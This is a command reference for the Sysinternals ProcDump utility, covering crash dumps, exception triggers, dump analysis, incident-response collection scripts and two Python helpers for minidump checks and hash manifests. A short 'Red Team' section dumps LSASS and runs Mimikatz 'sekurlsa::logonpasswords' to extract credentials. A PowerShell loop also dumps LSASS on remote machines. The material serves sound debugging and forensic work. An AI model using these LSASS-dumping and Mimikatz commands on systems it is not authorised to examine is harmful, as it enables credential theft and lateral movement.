
ProcDump

ProcDump is a Sysinternals command-line utility for creating crash dumps and monitoring Windows processes. It captures process memory and exceptions for analysis, debugging, and incident response.

Installation

Windows

# Run directly from Sysinternals Live (no install needed)
# https://live.sysinternals.com/procdump.exe

# Or download and extract the release zip (curl.exe and tar.exe ship with Windows 10 and later)
curl.exe -LO https://download.sysinternals.com/files/Procdump.zip
tar.exe -xf Procdump.zip

# Add to PATH (setx writes the user PATH; open a new console afterwards)
setx PATH "%PATH%;C:\path\to\procdump"

# Verify installation (prints the version banner and usage)
procdump -?

Linux/macOS (via WSL or Docker)

# Linux (including WSL): ProcDump for Linux, Microsoft's port, from the packages.microsoft.com repository
apt install procdump

# Or call the Windows binary from inside WSL through interop
procdump.exe -?

# macOS: use equivalent tools instead
# pstack, gcore or lldb core dumps

Verify Installation

# Accept the EULA once (stored in the registry) and show usage;
# the banner above the usage text includes the version (there is no -version switch)
procdump -accepteula -?

Essential Commands

Command                              Description
procdump <PID>                       Dump the running process with this PID (the target is a positional argument, not a -p switch)
procdump <name>                      Dump by image or service name (must match exactly one process; pass the PID otherwise)
procdump -ma <target>                Full memory dump (all pages)
procdump -mp <target>                MiniPlus dump: everything except the largest private memory regions
procdump -e <target>                 Dump on an unhandled exception (-e 1 also dumps on first-chance exceptions)
procdump -f <filter> <target>        Only trigger on first-chance exceptions whose code or name matches the filter (wildcards supported)
procdump -l <target>                 Display the process's debug logging output (not a process list)
procdump -x <folder> <image> [args]  Launch the image under ProcDump, writing dumps to the folder
procdump -s <seconds>                Consecutive seconds a trigger must hold, or the interval between dumps (default 10)
procdump -n <count>                  Write N dumps then exit
procdump -t <target>                 Dump when the process terminates
procdump -o                          Overwrite an existing dump file

Basic Process Dumping

Dump by Process ID

# Create a single full dump of a running process by PID
procdump -accepteula -ma 2345

# Dump by image name (the name must match exactly one running process;
# if several instances exist ProcDump refuses, and you must pass a PID)
procdump -accepteula -ma explorer.exe

# Write the dump into a specific, existing folder (the folder is a positional argument;
# -o means "overwrite an existing dump file", not "output directory")
procdump -accepteula -ma 2345 C:\dumps\

# ProcDump takes one target per run; loop for several
# (svchost.exe has many instances, so dump those by PID)
for %P in (explorer.exe lsass.exe) do procdump -accepteula -ma %P

Capture Exceptions

# Dump on any exception, first- or second-chance (-e 1)
procdump -accepteula -e 1 notepad.exe

# Dump on a specific exception type: -f filters first-chance exceptions by code or name,
# so it requires -e 1 (C0000005 is an access violation)
procdump -accepteula -e 1 -f C0000005 notepad.exe

# Dump on unhandled (second-chance) exceptions only: -e alone
# (there are no -e1 / -e2 switches; first chance is selected with "-e 1")
procdump -accepteula -e notepad.exe

Continuous Monitoring

# Write a dump every 5 seconds, 10 dumps in total
procdump -accepteula -s 5 -n 10 explorer.exe

# Dump when CPU usage stays at or above 75% for 10 consecutive seconds (the -s default)
procdump -accepteula -c 75 explorer.exe

# Dump when the process has a hung window (not responding to window messages for 5 seconds)
procdump -accepteula -h explorer.exe

# Dump when the process terminates (-t; -g is an unrelated managed-debugging switch)
procdump -accepteula -t explorer.exe

Advanced Dumping

Memory Analysis

# Full memory dump (includes all memory pages)
procdump -accepteula -ma lsass.exe

# MiniPlus dump (faster and smaller: drops the largest private memory regions);
# svchost.exe usually has several instances, so pass a PID instead of the name
procdump -accepteula -mp svchost.exe

# Embed a case comment in the dump (-dc) and give the file an explicit name for organization
procdump -accepteula -ma -dc "incident 001" lsass.exe C:\dumps\lsass_incident_001.dmp

Debugger Integration

# -x does not attach a debugger: it launches an image under ProcDump so that
# exceptions during startup can be captured (dump folder first, then the image and its arguments)
procdump -accepteula -e 1 -x C:\dumps notepad.exe

# Automated post-mortem analysis of a captured dump with CDB (Debugging Tools for Windows)
cdb -z C:\dumps\explorer.dmp -c "!analyze -v; q"

# Minidump (-mm, the default): thread stacks and module list only, resolved against symbols later
procdump -accepteula -mm explorer.exe

Filter and Targeting

# Exclude an exception from triggering (-fx); ProcDump has no per-thread exclusion
procdump -accepteula -e 1 -fx C0000005 explorer.exe

# Target a specific instance when several match: pass the PID (positional, no -p switch)
procdump -accepteula -ma 2345

# There is no process-tree mode; dump the parent and each child PID separately
for %P in (2345 2360 2372) do procdump -accepteula -ma %P

# Write to a different folder (positional); add -o to overwrite a dump file that already exists
procdump -accepteula -ma lsass.exe E:\Forensics\
procdump -accepteula -o -ma lsass.exe E:\Forensics\lsass.dmp

Incident Response Workflows

Malware Analysis Response

# 1. Quickly dump suspicious process (lsass for credentials)
procdump -accepteula -ma lsass.exe C:\incident\lsass_001.dmp

# 2. Dump on exception to capture crash
procdump -accepteula -e explorer.exe C:\incident\explorer_crash.dmp

# 3. Monitor for repeated failures
procdump -accepteula -s 10 -n 5 suspicious.exe C:\incident\suspicious_series.dmp

# 4. Capture several related processes (one target per ProcDump run;
#    names with many instances such as svchost.exe must be dumped by PID)
for %P in (explorer.exe rundll32.exe) do procdump -accepteula -ma %P C:\incident\

# 5. Export for forensic analysis
# Copy dumps to external media
xcopy C:\incident\*.dmp E:\forensic_analysis\

Crash Dump Collection

# Capture first-chance stack overflow exceptions (code C00000FD) from an application
procdump -accepteula -e 1 -f C00000FD app.exe

# Dump only on unhandled exceptions
procdump -accepteula -e myapp.exe

# Several dumps with timestamps: ProcDump expands the PROCESSNAME, PID, YYMMDD and HHMMSS tokens in the file name
procdump -accepteula -ma -s 30 -n 3 myapp.exe C:\dumps\crash_PROCESSNAME_YYMMDD_HHMMSS.dmp

Performance Analysis

# Dump on high CPU (over 80%)
procdump -accepteula -c 80 explorer.exe

# Monitor and dump on hang
procdump -accepteula -h explorer.exe

# Up to 10 dumps, each written when CPU stays at or above 75% for 5 consecutive seconds
procdump -accepteula -c 75 -s 5 -n 10 heavy_process.exe

Analyzing Dumps

Extract from Dump

# Open a dump in WinDbg for analysis
windbg -z lsass_001.dmp

# Load with a specific symbol path (-y must precede -z, otherwise the symbol path is taken as the dump file)
windbg -y "srv*C:\symbols*https://msdl.microsoft.com/download/symbols" -z dump.dmp

# Inside the debugger: automatic crash analysis
!analyze -v

# Extract strings from a dump (Sysinternals strings.exe; findstr matches any of the listed words)
strings -accepteula dump.dmp | findstr /i "password key secret"

# Inside the debugger: list loaded modules (lm is a built-in command, not an extension)
lm

Dump Inspection

# Verify dump integrity with DumpChk (ships with Debugging Tools for Windows)
dumpchk dump.dmp

# Show the dump's header, flags and stream directory without a full debugging session
cdb -z dump.dmp -c ".dumpdebug; q"

# Compare two dumps
fc /b dump1.dmp dump2.dmp
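The checks above depend on debugger tooling being installed. As an added example (not part of ProcDump or of this page), the following Python script performs the same structural sanity check on any host: it parses the MINIDUMP header and stream directory that every ProcDump .dmp begins with, confirms the signature and version, and verifies that each stream lies inside the file, which is how a truncated copy is caught before transport. The layout follows the public MINIDUMP_HEADER and MINIDUMP_DIRECTORY structures; the bytes produced by build_sample_minidump() are constructed for the demonstration and are not a real process dump.

```python
"""Sanity-check a .dmp file written by ProcDump by parsing its MINIDUMP header
and stream directory. Added example, not part of ProcDump; standard library only.
Layout follows the public MINIDUMP_HEADER / MINIDUMP_DIRECTORY structures
(dbghelp.h). build_sample_minidump() returns constructed bytes, not real memory."""
import struct
import sys

MINIDUMP_SIGNATURE = 0x504D444D   # "MDMP" read as a little-endian ULONG32
MINIDUMP_VERSION = 0xA793         # low 16 bits of MINIDUMP_HEADER.Version
HEADER_FMT = "<IIIIIIQ"           # Signature, Version, NumberOfStreams, StreamDirectoryRva,
                                  # CheckSum, TimeDateStamp, Flags (MINIDUMP_TYPE)
DIRECTORY_FMT = "<III"            # StreamType, Location.DataSize, Location.Rva

# MINIDUMP_STREAM_TYPE values commonly present in ProcDump output
STREAM_NAMES = {
    3: "ThreadListStream", 4: "ModuleListStream", 5: "MemoryListStream",
    6: "ExceptionStream", 7: "SystemInfoStream", 9: "Memory64ListStream",
    10: "CommentStreamA", 11: "CommentStreamW", 12: "HandleDataStream",
    15: "MiscInfoStream", 16: "MemoryInfoListStream", 17: "ThreadInfoListStream",
}
MINIDUMP_WITH_FULL_MEMORY = 0x2   # MiniDumpWithFullMemory flag, set by procdump -ma


class MinidumpError(ValueError):
    """Raised when the data is not a structurally valid minidump."""


def parse_minidump(data: bytes) -> dict:
    """Validate the header and stream directory; return flags and the stream table.
    Every stream must lie inside the file, which catches truncated copies."""
    header_size = struct.calcsize(HEADER_FMT)
    if len(data) < header_size:
        raise MinidumpError("shorter than MINIDUMP_HEADER")
    sig, version, nstreams, dir_rva, _csum, tstamp, flags = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != MINIDUMP_SIGNATURE:
        raise MinidumpError(f"bad signature 0x{sig:08X}, expected MDMP")
    if version & 0xFFFF != MINIDUMP_VERSION:
        raise MinidumpError(f"unexpected minidump version 0x{version & 0xFFFF:04X}")
    entry_size = struct.calcsize(DIRECTORY_FMT)
    if dir_rva + nstreams * entry_size > len(data):
        raise MinidumpError("stream directory runs past end of file (truncated dump?)")
    streams = []
    for i in range(nstreams):
        stype, size, rva = struct.unpack_from(DIRECTORY_FMT, data, dir_rva + i * entry_size)
        name = STREAM_NAMES.get(stype, f"Unknown({stype})")
        if rva + size > len(data):
            raise MinidumpError(f"{name} at RVA 0x{rva:X} (+0x{size:X}) exceeds file size")
        streams.append({"type": stype, "name": name, "size": size, "rva": rva})
    return {"timestamp": tstamp, "flags": flags,
            "full_memory": bool(flags & MINIDUMP_WITH_FULL_MEMORY), "streams": streams}


def is_valid_minidump(data: bytes) -> bool:
    """Boolean form of parse_minidump for scripted integrity checks."""
    try:
        parse_minidump(data)
        return True
    except MinidumpError:
        return False


def build_sample_minidump(full_memory: bool = True) -> bytes:
    """Constructed sample: header, two directory entries, a comment stream and a
    zero-filled SystemInfo placeholder. Not real process memory."""
    comment = b"constructed sample, not a real dump\x00"
    sysinfo = bytes(56)                               # sizeof(MINIDUMP_SYSTEM_INFO)
    dir_rva = struct.calcsize(HEADER_FMT)             # directory follows the header
    comment_rva = dir_rva + 2 * struct.calcsize(DIRECTORY_FMT)
    sysinfo_rva = comment_rva + len(comment)
    flags = MINIDUMP_WITH_FULL_MEMORY if full_memory else 0
    header = struct.pack(HEADER_FMT, MINIDUMP_SIGNATURE, (0x4E2F << 16) | MINIDUMP_VERSION,
                         2, dir_rva, 0, 1700000000, flags)
    directory = (struct.pack(DIRECTORY_FMT, 10, len(comment), comment_rva)
                 + struct.pack(DIRECTORY_FMT, 7, len(sysinfo), sysinfo_rva))
    return header + directory + comment + sysinfo


if __name__ == "__main__":
    # usage: python check_dump.py C:\dumps\lsass_001.dmp   (no argument: parse the constructed sample)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_minidump()
    info = parse_minidump(blob)
    print(f"full memory: {info['full_memory']}  streams: {len(info['streams'])}")
    for s in info["streams"]:
        print(f"  {s['name']:<22} size=0x{s['size']:X} rva=0x{s['rva']:X}")
```

The full_memory flag is a quick way to confirm that a dump collected with -ma really is a full dump before it leaves the host; a -mm dump has the flag clear and no large memory streams.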

Batch Processing

Script for Collection

@echo off
REM Collect dumps of critical processes
cd C:\dumps

REM Dump LSASS (credentials)
procdump -accepteula -ma lsass.exe lsass.dmp

REM Dump explorer (user session)
procdump -accepteula -ma explorer.exe explorer.dmp

REM Dump a service host by PID (svchost.exe matches many processes, so the name alone is rejected)
procdump -accepteula -ma <svchost PID> svchost.dmp

REM Verify dumps created
dir *.dmp

REM Compress for transport
tar.exe -czf incident_dumps.tar.gz *.dmp

PowerShell Automation

# Dump all process instances matching pattern
Get-Process notepad | ForEach-Object {
    & "C:\tools\procdump.exe" -accepteula -ma $_.Id
}

# Monitor for specific exception
$process = "app.exe"
& "C:\tools\procdump.exe" -accepteula -e $process

# Collect from multiple machines ($using: passes the local variable into the remote script block;
# C:\incident must already exist on each target)
$computers = @("server1", "server2")
foreach ($computer in $computers) {
    Invoke-Command -ComputerName $computer -ScriptBlock {
        & "C:\tools\procdump.exe" -accepteula -ma lsass.exe "C:\incident\$($using:computer)_lsass.dmp"
    }
}

Troubleshooting

Common Issues

Access Denied / Elevation Required

# Most process dumping requires elevation (SeDebugPrivilege).
# Run from an elevated prompt, or start it with runas (the whole command is one quoted argument):
runas /user:Administrator "procdump -accepteula -ma process.exe"
# Processes protected by PPL (for example lsass.exe with RunAsPPL enabled) cannot be opened even when elevated

# Check current privileges
whoami /priv

Process Not Found

# List all running processes (ProcDump's -l shows a process's debug logging, not a process list)
tasklist

# Get the PID of a specific process
tasklist | find /i "explorer.exe"

# Use the image name without a path, the service name, or the PID; ProcDump does not accept a file path as target
procdump -accepteula -ma app.exe

Dump File Already Exists

# ProcDump refuses to overwrite an existing dump file; add -o to overwrite it
procdump -accepteula -o -ma explorer.exe C:\dumps\explorer.dmp

# Or put a timestamp in the file name using ProcDump's YYMMDD and HHMMSS tokens
procdump -accepteula -ma explorer.exe C:\dumps\explorer_YYMMDD_HHMMSS.dmp

Lock/Permission Issues on Dump Files

# File locked by indexing service
taskkill /F /IM SearchIndexer.exe

# Copy dump to different location
copy C:\dumps\crash.dmp E:\forensics\crash.dmp /Y

# Change ownership
icacls C:\dumps\crash.dmp /grant:r %USERNAME%:F

Verification and Troubleshooting

# Verify dump can be opened in debugger
windbg -z dump.dmp

# Check for corruption (fc only lists byte differences; DumpChk validates the dump structure)
dumpchk dump.dmp

# Get dump file properties
wmic datafile where name="C:\\dumps\\lsass.dmp" get FileSize

# Monitor dumps being created
fsutil usn readjournal C:\ | findstr ".dmp"

Real-World Scenarios

Blue Team: Collect Evidence

REM Incident response: collect critical process memory
@echo off
setlocal enabledelayedexpansion

set DUMP_DIR=C:\forensics\incident_%date:~-4%%date:~-10,2%%date:~-7,2%
mkdir %DUMP_DIR%

echo [*] Collecting LSASS memory (credentials/hashes)
procdump -accepteula -ma lsass.exe %DUMP_DIR%\lsass.dmp

echo [*] Collecting explorer memory (user session)
procdump -accepteula -ma explorer.exe %DUMP_DIR%\explorer.dmp

echo [*] Collecting service hosts (svchost.exe has many instances, so each PID is dumped separately)
for /f "tokens=2" %%A in ('tasklist /nh /fi "imagename eq svchost.exe"') do (
    procdump -accepteula -ma %%A %DUMP_DIR%\svchost_%%A.dmp
)

echo [*] Securing dumps
icacls %DUMP_DIR% /inheritance:r /grant:r "%USERDOMAIN%\%USERNAME%:F"
tar.exe -czf %DUMP_DIR%.tar.gz %DUMP_DIR%

echo [*] Dumps collected to %DUMP_DIR%
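The batch and PowerShell collection scripts above stop at writing the dumps. As an added example (not ProcDump's code and not part of the page's scripts), this Python script shows the two things a responder usually adds: resolving every instance of an image name to a PID before calling ProcDump, since ProcDump rejects an ambiguous name, and writing a SHA-256 manifest beside the dumps so they can be verified after transport. It assumes procdump.exe is on PATH and that it runs elevated on the host being examined; the CSV layout of tasklist and ProcDump's PROCESSNAME/PID/YYMMDD/HHMMSS filename tokens are documented behaviour, and SAMPLE_TASKLIST is constructed output for the offline demonstration.

```python
"""Dump every instance of an image name by PID and record a SHA-256 manifest.
Added example, not part of ProcDump or of the scripts above. Assumes procdump.exe
is on PATH and that this runs elevated on the Windows host under examination.
SAMPLE_TASKLIST is constructed tasklist output used for the offline demo."""
import csv
import hashlib
import io
import json
import subprocess
import tempfile
import time
from pathlib import Path

# Constructed sample of: tasklist /fo csv /nh /fi "imagename eq svchost.exe"
SAMPLE_TASKLIST = (
    '"svchost.exe","1084","Services","0","9,832 K"\r\n'
    '"svchost.exe","1432","Services","0","12,104 K"\r\n'
    '"svchost.exe","2268","Console","1","5,560 K"\r\n'
)


def parse_tasklist_csv(text: str) -> list:
    """Return the PIDs from tasklist CSV rows; the 'INFO: No tasks ...' message yields none."""
    pids = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) >= 2 and row[1].isdigit():
            pids.append(int(row[1]))
    return pids


def list_pids(image_name: str) -> list:
    """Query tasklist for every process with this image name (Windows only)."""
    out = subprocess.run(
        ["tasklist", "/fo", "csv", "/nh", "/fi", f"imagename eq {image_name}"],
        capture_output=True, text=True, check=True).stdout
    return parse_tasklist_csv(out)


def procdump_command(pid: int, dump_dir, comment: str) -> list:
    """One ProcDump run per PID: a PID is unambiguous where an image name such as
    svchost.exe matches several processes. -dc embeds a case comment in the dump;
    the PROCESSNAME/PID/YYMMDD/HHMMSS tokens are expanded by ProcDump itself."""
    return ["procdump", "-accepteula", "-ma", "-dc", comment, str(pid),
            str(Path(dump_dir) / "PROCESSNAME_PID_YYMMDD_HHMMSS.dmp")]


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 (dumps can be gigabytes, so avoid read())."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def write_manifest(dump_dir: Path) -> dict:
    """Hash every .dmp in dump_dir and write manifest.json next to them, so the
    dumps can be re-verified after transport (chain of custody)."""
    dumps = {p.name: {"sha256": sha256_file(p), "size": p.stat().st_size}
             for p in sorted(dump_dir.glob("*.dmp"))}
    manifest = {"created_utc": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
                "dumps": dumps}
    (dump_dir / "manifest.json").write_text(json.dumps(manifest, indent=2))
    return manifest


def collect(image_name: str, dump_dir: Path, comment: str) -> dict:
    """Dump all instances of image_name into dump_dir, then write the manifest."""
    dump_dir.mkdir(parents=True, exist_ok=True)
    for pid in list_pids(image_name):
        subprocess.run(procdump_command(pid, dump_dir, comment), check=False)
    return write_manifest(dump_dir)


def demo_manifest() -> dict:
    """Offline demonstration of write_manifest on a constructed, empty .dmp file."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "svchost.exe_1084_constructed.dmp").write_bytes(b"")
        return write_manifest(d)


if __name__ == "__main__":
    print(parse_tasklist_csv(SAMPLE_TASKLIST))
    print(procdump_command(1084, r"C:\forensics\incident", "case 001"))
    # On the examined host (elevated):
    # collect("svchost.exe", Path(r"C:\forensics\incident"), "case 001")
```

Re-running write_manifest on the analysis workstation and diffing the two manifest.json files confirms that no dump was altered or truncated in transit, which is the check the "Test dump file integrity before transport" tip below asks for.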

Red Team: Exfiltrate Credentials

REM Dump LSASS for credential extraction
procdump -accepteula -ma lsass.exe lsass.dmp

REM Extract hashes/keys using Mimikatz
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit

Malware Analysis: Monitor for Crashes

REM Monitor a running sample for crashes (dump on an unhandled exception)
procdump -accepteula -e sample.exe crash_001.dmp

REM Launch the sample under ProcDump (-x takes the dump folder, then the image) and dump on
REM first-chance exceptions; open the resulting dumps in WinDbg with -z afterwards
procdump -accepteula -e 1 -x C:\dumps sample.exe

Tips and Best Practices

  • Always get elevated (Administrator) privileges for dumping system processes
  • LSASS dumps contain hashes/secrets - handle with care in forensics
  • Use full dumps (-ma) for complete analysis, partial (-mp) for speed
  • Timestamp your dumps to maintain chronological integrity
  • Test dump file integrity before transport or analysis
  • Dumps can be very large (process memory size) - plan storage
  • Compress dumps for secure transport: tar.exe or 7z
  • Clean up dumps after analysis to prevent data leaks
  • Use -accepteula to suppress confirmation in scripts
  • Monitor CPU/memory impact when dumping large processes


Last updated: 2026-03-30